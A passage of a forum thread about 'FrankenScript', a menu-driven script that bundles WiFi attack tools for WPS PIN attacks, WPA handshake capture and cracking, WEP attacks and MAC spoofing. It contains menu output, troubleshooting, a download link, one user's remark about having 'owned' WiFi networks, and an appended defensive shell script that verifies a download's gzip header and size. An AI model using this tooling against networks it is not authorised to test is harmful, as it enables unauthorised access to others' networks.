    Then I can put the script into a folder rather than putting it directly into FrankenScript.

    Many thanks matey.

  21. #71
    Join Date
    2013-Oct
    Posts
    321
    Updated FrankenScript to 3.2.

  22. #72
    Join Date
    2013-Jun
    Posts
    123
    Slim,

    At different points, when I have to click [Enter] to start a scan, a second terminal window opens then closes again quickly. I just downloaded 3.2 and it is still doing it.

  23. #73
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by brazen View Post
    Slim,

    At different points, when I have to click [Enter] to start a scan, a second terminal window opens then closes again quickly. I just downloaded 3.2 and it is still doing it.
    Can you provide more details please mate? I need to know exactly where it happens.

    If anyone else is having issues please post the details and I'll look into it.
    Last edited by slim76; 2014-02-06 at 23:17.

  24. #74
    Join Date
    2013-Jun
    Posts
    123
    root@kali:~# cd FrankenScript/
    root@kali:~/FrankenScript# ./FrankenScript.sh


    #########################################
    # FrankenScript #
    #########################################
    # #
    # [1] Interface Selection #
    # [2] System Mode Selection #
    # [3] Attack A WPS Enabled Access Point #
    # [4] Capture WPA/WPA2 Handshake #
    # [5] WEP Attacks #
    # [6] Attack Handshake.cap Files #
    # [7] Show Recovered Passkeys #
    # [8] Recovered Passkey Checker #
    # #
    #########################################

    Chosen Interface:
    System Mode: Networking Mode Is Enabled
    MAC address for mon0:

    Please choose an option?: 3

    Scan for WPS enabled access points.
    Press Ctrl+c on the wash screen to stop the scan and to choose a target.
    Press [Enter] to launch the scan.

    Please wait...

    [ I THINK THIS IS WHERE THE SECOND WINDOW OPENS FOR HALF A SECOND AND THEN CLOSES AND I AM BACK TO THE PRIMARY WINDOW]

    Available Access Points.

    Please input the number of your chosen target:

  25. #75
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by brazen View Post
    root@kali:~# cd FrankenScript/
    root@kali:~/FrankenScript# ./FrankenScript.sh


    #########################################
    # FrankenScript #
    #########################################
    # #
    # [1] Interface Selection #
    # [2] System Mode Selection #
    # [3] Attack A WPS Enabled Access Point #
    # [4] Capture WPA/WPA2 Handshake #
    # [5] WEP Attacks #
    # [6] Attack Handshake.cap Files #
    # [7] Show Recovered Passkeys #
    # [8] Recovered Passkey Checker #
    # #
    #########################################

    Chosen Interface:
    System Mode: Networking Mode Is Enabled
    MAC address for mon0:

    Please choose an option?: 3

    Scan for WPS enabled access points.
    Press Ctrl+c on the wash screen to stop the scan and to choose a target.
    Press [Enter] to launch the scan.

    Please wait...

    [ I THINK THIS IS WHERE THE SECOND WINDOW OPENS FOR HALF A SECOND AND THEN CLOSES AND I AM BACK TO THE PRIMARY WINDOW]

    Available Access Points.

    Please input the number of your chosen target:
    Hmmm, did the wash scan work OK?

  26. #76
    Join Date
    2013-Jun
    Posts
    123
    Slim... this may just be me... see below... it worked correctly this time when I chose to disable processes that might cause issues: Y

    ********************************************

    Please choose an option?: 1

    Available WiFi Adapters.
    ########################

    1: wlan0

    Please input the number of your chosen WiFi adapter: 1

    #########################################
    # FrankenScript #
    #########################################
    # #
    # [1] Interface Selection #
    # [2] System Mode Selection #
    # [3] Attack A WPS Enabled Access Point #
    # [4] Capture WPA/WPA2 Handshake #
    # [5] WEP Attacks #
    # [6] Attack Handshake.cap Files #
    # [7] Show Recovered Passkeys #
    # [8] Recovered Passkey Checker #
    # #
    #########################################

    Chosen Interface: wlan0
    System Mode: Networking Mode Is Enabled
    MAC address for mon0:

    Please choose an option?: 2

    What system mode would you like to set.
    [1] = Put The System Into Networking Mode.
    [2] = Put The System Into Attack Mode.
    [3] = Return To Menu.
    1, 2 or 3?: 2

    Would you like to disable processes that might cause issues y/n?: y

    Would you like to disable NetworkManager y/n?: y

    Would you like to disable wpa_supplicant y/n?: y

    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    3051 dhclient
    3057 dhclient


    Interface Chipset Driver

    wlan0 Broadcom b43 - [phy0]
    (monitor mode enabled on mon0)


    Permanent MAC: b8:8d:12:30:6b:f2 (unknown)
    Current MAC: b8:8d:12:30:6b:f2 (unknown)
    New MAC: 40:2d:60:68:79:8f (unknown)




    #########################################
    # FrankenScript #
    #########################################
    # #
    # [1] Interface Selection #
    # [2] System Mode Selection #
    # [3] Attack A WPS Enabled Access Point #
    # [4] Capture WPA/WPA2 Handshake #
    # [5] WEP Attacks #
    # [6] Attack Handshake.cap Files #
    # [7] Show Recovered Passkeys #
    # [8] Recovered Passkey Checker #
    # #
    #########################################

    Chosen Interface: wlan0
    System Mode: Attack Mode Is Enabled
    MAC address for mon0: 40:2d:60:68:79:8f

    Please choose an option?: 3

    Scan for WPS enabled access points.
    Press Ctrl+c on the wash screen to stop the scan and to choose a target.
    Press [Enter] to launch the scan.

  27. #77
    Join Date
    2013-Oct
    Posts
    321
    Glad to hear it's working for you. You'll have to have a little play with it to get used to it and to find out what works for you.

    So what are your opinions regarding FrankenScript? Anything you would like to see added to it?
    All constructive criticism welcome. :-)
    Last edited by slim76; 2014-02-06 at 23:36.

  28. #78
    Join Date
    2013-Oct
    Posts
    321
    Due to the lack of feedback and interest I very much doubt that I'll be releasing any further updates or scripts.

  29. #79
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98
    I'd like to see other things you release.
    Smile while you can for in the future there my be nothing to smile about.

  30. #80
    Join Date
    2014-Feb
    Posts
    1
    I'm very interested in trying this out, slim, and major props for making it.

    I will be testing it out tonight on BT5 R3 and see if it works. It should in theory since I have dhcp3 client / server and mdk3 already installed and up to date.

    I am also installing kali right now on another USB stick so we'll see how this goes.

    Once again, thanks for this major work. I looked at the script and it is huge. One of the largest I've ever seen next to the Social Engineering Toolkit.

  31. #81
    Join Date
    2014-Feb
    Posts
    1
    Hi slim,

    I finally had time to try your script at the weekend with the WPS attack option on my TP-Link N750 router. Your script worked great, wash has no problem finding WPS enabled APs and the options for reaver are easy to incorporate. Just my router locked out easily, but your mdk3 options come in handy to reset it. I think it's just a matter of time for me to attack my router successfully.

    Your script is great for putting many tools together for pentesting APs. I have yet to try attacking handshakes with your script.... can't wait to see your new update!


  32. #82
    Join Date
    2013-Oct
    Posts
    321
    I've already updated option 6 again, it now supports drag and drop a wordlist or directory containing multiple wordlists.
    Not sure if I'm going upload it for everyone though, but I guess time will tell.

  33. #83
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Cl0th0 View Post
    Hi slim,

    I finally had time to try your script at the weekend with the WPS attack option on my TP-Link N750 router. Your script worked great, wash has no problem finding WPS enabled APs and the options for reaver are easy to incorporate. Just my router locked out easily, but your mdk3 options come in handy to reset it. I think it's just a matter of time for me to attack my router successfully.

    Your script is great for putting many tools together for pentesting APs. I have yet to try attacking handshakes with your script.... can't wait to see your new update!

    Thanks for testing MDK3 for me hahahah... I haven't had time to test it but I guess it's working! Good job slim!

  34. #84
    Join Date
    2013-Jul
    Posts
    844
    To soxrox 2212

    Any chance you could send us version 2? We tried Kali Linux, Win7 and XP for hours.

    Muskt Team A

  35. #85
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by mmusket33 View Post
    To soxrox 2212

    Any chance you could send us version 2? We tried Kali Linux, Win7 and XP for hours.

    Muskt Team A
    Version 2 of what?

  36. #86
    Join Date
    2013-Jul
    Posts
    844
    Sorry Soxrox, we were referring to FrankenScript-v3.2, our mistake. We are unable to download a copy where we are at present.

  37. #87
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by mmusket33 View Post
    Sorry Soxrox, we were referring to FrankenScript-v3.2, our mistake. We are unable to download a copy where we are at present.
    Sure I'll e-mail you it.

  38. #88
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Any more updates on the script coming?

  39. #89
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by soxrok2212 View Post
    Any more updates on the script coming?
    It's changed a lot since I last posted it here, I've added new features, options, and tools. ;-)
    People didn't want to leave any feedback so I stopped uploading it.
    I can't fix things for others if they won't tell me what is and isn't working for them.

  40. #90
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by slim76 View Post
    It's changed a lot since I last posted it here, I've added new features, options, and tools. ;-)
    People didn't want to leave any feedback so I stopped uploading it.
    I can't fix things for others if they won't tell me what is and isn't working for them.
    Guess I'll go do some bug hunting soon

  41. #91
    Join Date
    2014-Jun
    Posts
    1
    slim76, just wanted to let you know that I really love your script and I would love to get the updated version of it. It owned a couple of WiFis in minutes so far.

  42. #92
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    So was this script incorporated in 1.0.7?

    How can we follow development of FrankenScript slim76? These forums are not the best way to get feedback from what I've noticed.

    Anyways, continue the good work!!
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  43. #93
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Slim, I was wondering if you could add a Belkin default password generator. Here is the git page from the developer; Safari tells me that there may be possible phishing on the site, but I think it's clean... Proceed with caution. The original thread is here. Let me know if you can get it working!

  44. #94
    Join Date
    2013-Oct
    Posts
    321
    @ learning.
    I'm currently rewriting a couple of the attack options, then I'll upload it.

    @ Quest.
    It's not included in Kali but you can download it from the first page, if the links are dead you can ask another member if they'll upload it for you, or you can wait for the updated version.

    @ soxrok2212.
    I added Belkin default password generator ages ago lol, I also added some others too. :-)

    To all,
    Will upload the new version when I've rewritten some of the options.

  45. #95
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    That is just great!

    If someone who actually knows what he's doing can write a short how-to for that new version (to come) of FrankenScript, it will be appreciated. As obvious as some operations may seem to some of you, it is a complete mystery for others.

    If some of you can 'torrent' it, it will facilitate accessibility for all.

    Thank you for all the work Slim!! Hopefully it will make its way into the next Kali.

  46. #96
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by Quest View Post
    That is just great!

    If someone who actually knows what he's doing can write a short how-to for that new version (to come) of FrankenScript, it will be appreciated. As obvious as some operations may seem to some of you, it is a complete mystery for others.

    If some of you can 'torrent' it, it will facilitate accessibility for all.

    Thank you for all the work Slim!! Hopefully it will make its way into the next Kali.
    There's no need to torrent it as it's only a small file, and no need for a how-to either because it's dummy proof. LOL

  47. #97
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    Dummy proof is good! A torrent though might help you diffuse your work. Any ETA on the new version, Slim?

  48. #98
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by Quest View Post
    Dummy proof is good! A torrent though might help you diffuse your work. Any ETA on the new version, Slim?
    I've got a lot going on at the moment but hope to have it ready within the next few days if all goes well.

  49. #99
    Join Date
    2013-Oct
    Posts
    321
    Here's the latest FrankenScript.

    WHEN DOWNLOADING, DO NOT CLICK THE BIG DOWNLOAD BUTTON AT THE TOP OF THE PAGE.

    FrankenScript2-10-06-2014.tar.gz
    http://mir.cr/0HBX0O5C
    Last edited by slim76; 2014-06-10 at 00:08.

  50. #100
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    Some of the downloads are NOT FrankenScript2-10-06-2014.tar.gz but FrankenScript2-10-06-2014.tar.gz.exe (322*576 b).

    The download should be 1*081*616 b in size, named FrankenScript2-10-06-2014.tar.gz, and not an exe.

    Thank you Slim!!
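    The check Quest describes in post #100 (right name, right size, not an .exe) can be scripted so a downloaded archive is inspected before anything is extracted or run. The following is an added example written for this thread; it is not FrankenScript code and not any forum member's script. It refuses a file with an executable extension, reads the first two bytes and requires the gzip magic (1f 8b) rather than the Windows PE "MZ" header, and compares the byte size against an expected value. The demo files at the bottom are constructed, and the 1081616-byte figure is only the size quoted in the thread for FrankenScript2-10-06-2014.tar.gz, not something verified here.

```shell
#!/bin/sh
# Added example for this thread (not FrankenScript code): check a downloaded
# archive before extracting it. A mirror can hand out "name.tar.gz.exe" under
# an archive-looking link, so the name alone proves nothing; the magic bytes
# and the byte size are checked instead.

# magic_of FILE: print the first two bytes as lowercase hex (gzip = 1f8b, PE/DOS = 4d5a)
magic_of() {
    dd if="$1" bs=2 count=1 2>/dev/null | od -An -tx1 | tr -d ' \n'
}

# size_of FILE: byte size (wc -c on stdin prints no file name, so the output is just the number)
size_of() {
    wc -c < "$1" | tr -d ' '
}

# verify_archive FILE EXPECTED_SIZE
# Returns 0 only when FILE has a non-executable name, starts with the gzip
# magic, and is exactly EXPECTED_SIZE bytes. Prints the reason otherwise.
verify_archive() {
    file="$1"
    expected="$2"
    case "$file" in
        *.exe|*.scr|*.com|*.bat)
            echo "refused: executable extension on $file"
            return 1 ;;
    esac
    [ -f "$file" ] || { echo "refused: $file is not a regular file"; return 1; }
    magic=$(magic_of "$file")
    if [ "$magic" = "4d5a" ]; then
        echo "refused: $file starts with an MZ header (Windows executable), not a gzip archive"
        return 1
    fi
    if [ "$magic" != "1f8b" ]; then
        echo "refused: $file does not start with the gzip magic (got '$magic')"
        return 1
    fi
    actual=$(size_of "$file")
    if [ "$actual" != "$expected" ]; then
        echo "refused: $file is $actual bytes, expected $expected"
        return 1
    fi
    echo "ok: $file is a gzip archive of $expected bytes"
    return 0
}

# Demo on constructed files (not the real download). The 1081616-byte figure
# is the size quoted in the thread for FrankenScript2-10-06-2014.tar.gz.
demo_run() {
    d=$(mktemp -d)
    printf 'demo' | gzip -c > "$d/good.tar.gz"                 # genuine gzip stream
    printf 'MZ\220\000\003\000' > "$d/bad.tar.gz"              # PE header under an archive name
    good_size=$(size_of "$d/good.tar.gz")
    verify_archive "$d/good.tar.gz" "$good_size"               # ok
    verify_archive "$d/bad.tar.gz" "$good_size" || true        # refused: MZ header
    verify_archive "$d/good.tar.gz" 1081616 || true            # refused: size mismatch for the demo file
    verify_archive "$d/FrankenScript2-10-06-2014.tar.gz.exe" 1081616 || true   # refused by extension
    rm -rf "$d"
}
demo_run
```

    Against a real download you would call verify_archive with the path and the size the author published, and only then run tar; a size match plus the gzip magic rules out the mislabelled .exe case from post #100, although it is no substitute for a checksum published by the author.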
